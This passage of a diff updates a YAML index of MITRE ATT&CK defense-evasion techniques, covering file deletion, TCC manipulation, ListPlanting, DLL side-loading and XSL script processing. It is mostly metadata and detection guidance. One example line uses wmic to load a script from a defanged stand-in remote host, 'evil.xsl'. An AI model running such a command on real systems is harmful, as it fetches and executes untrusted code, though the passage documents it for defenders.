-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12322,18 +12623,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12395,7 +12714,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12425,13 +12744,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12528,7 +12845,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12591,7 +12907,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12629,7 +12944,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12656,8 +12971,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12685,7 +12998,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12729,8 +13042,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12785,7 +13096,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12805,7 +13116,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -12855,7 +13165,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -12910,12 +13219,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -12965,12 +13273,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13030,8 +13337,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13048,37 +13355,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13086,6 +13374,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13093,7 +13383,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13123,7 +13413,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13169,7 +13458,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13214,8 +13503,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13260,7 +13547,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13274,58 +13561,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -13342,6 +13599,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -13356,21 +13616,52 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13415,9 +13706,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -13474,8 +13764,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -13484,57 +13774,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -13552,29 +13796,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
